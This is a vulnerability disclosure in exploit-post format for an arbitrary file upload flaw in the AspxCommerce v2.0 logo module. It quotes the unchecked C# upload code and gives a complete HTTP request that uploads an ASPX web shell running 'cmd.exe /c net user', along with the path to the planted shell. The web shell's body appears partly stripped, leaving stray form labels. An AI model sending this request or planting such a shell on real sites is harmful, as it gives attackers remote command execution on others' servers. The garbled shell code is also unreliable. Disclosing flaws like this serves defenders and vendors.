# Exploit Title: AspxCommerce v2.0 - Arbitrary File Upload Vulnerability # Exploit Author: SANTHO (@s4n7h0) # Vendor Homepage: http://www.aspxcommerce.com/ # Version: Version 2.0 and below Introduction: ~~~~~~~~~~~~~ AspxCommerce is a complete e-Commerce solution for setting up a fully functional online store in minutes. It's fully customizable with rich set of features. You can customize the complete front end, change the look and feel, create categories and subcategories, add and modify products, accept payments through credit cards and facilitates a lot of other features. Exploitation Details: ~~~~~~~~~~~~~~~~~~~~~ The application doesn't sanitize file extension or content in the Logo Editing module. The vulnerability allows a remote attacker to upload files via POST method with multiple extensions and access them remotely. Vulnerable Module : LogoHandler.ashx Vulnerable Code : string strFileName = Path.GetFileName(context.Request.Files[0].FileName); string strExtension = Path.GetExtension(context.Request.Files[0].FileName).ToLower(); strFileName = strFileName.Substring(0, strFileName.Length - strExtension.Length); strFileName = strFileName + '_' + rnd.Next(111111, 999999).ToString() + strExtension; int strSize = HttpContext.Current.Request.Files[0].ContentLength; string strBaseLocation = HttpContext.Current.Server.MapPath("~/Modules/Logo/image/"); if (!Directory.Exists(strBaseLocation)) { Directory.CreateDirectory(strBaseLocation); } string strSaveLocation = strBaseLocation + strFileName; HttpContext.Current.Request.Files[0].SaveAs(strSaveLocation); retMsg = "Modules/Logo/image/" + strFileName; Proof of Concept: ~~~~~~~~~~~~~~~~~ POST /Modules/Logo/LogoHandler.ashx HTTP/1.1 Host: aspxcommerce.localhost User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://aspxcommerce.localhost/Sagin/HandleModuleControls.aspx?uid=342&pid=1 Cookie: nessus-session=false; VisitCount=10; OriginalURL= http://aspxcommerce.localhost/; ASP.NET_SessionId=ks51au3fwkgnmtebeznhl245; __zlcid=%7B%22mID%22%3A%22L0dAifDhLZG23y%22%2C%22sid%22%3A%22130919.327274.49Hg448a%22%7D; OriginalReferrer=http://aspxcommerce.localhost/; SageUserRolesCookie=SageUserRolesCookie=Site Admin&SageUserRolesProtected=910f0c31-e1dd-42d2-988b-545fe8621544; SageFrame.AUTH__1=4374B9AB7C8ACCE26B3DF7734F2DEA168E06E27D8852C0346F86CDB566D2B9D22A256A9C56F561DCFF57A79F473E37DAF19D7E8AFC32D97DE3CAAA0769B8D3FDC604FDCF6768838E3C30E0E9C84974B0373627A00D793AA792590BAB93CF6EF8105E81E156A0DEB1E0910C1BC1583AC69F3FDFEC Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------56701790317916 Content-Length: 1789 -----------------------------56701790317916 Content-Disposition: form-data; name="myfile[]"; filename="cmd.aspx" Content-Type: application/octet-stream <%@ Page Language="VB" Debug="true" %> <%@ import Namespace="system.IO" %> <%@ import Namespace="System.Diagnostics" %>

Program c:\windows\system32\cmd.exe

Arguments /c net user

-----------------------------56701790317916-- Uploaded Shell's Access Path : http://aspxcommerce.localhost/Modules/Logo/image/cmd_134724.aspx -- SANTHO twitter : @s4n70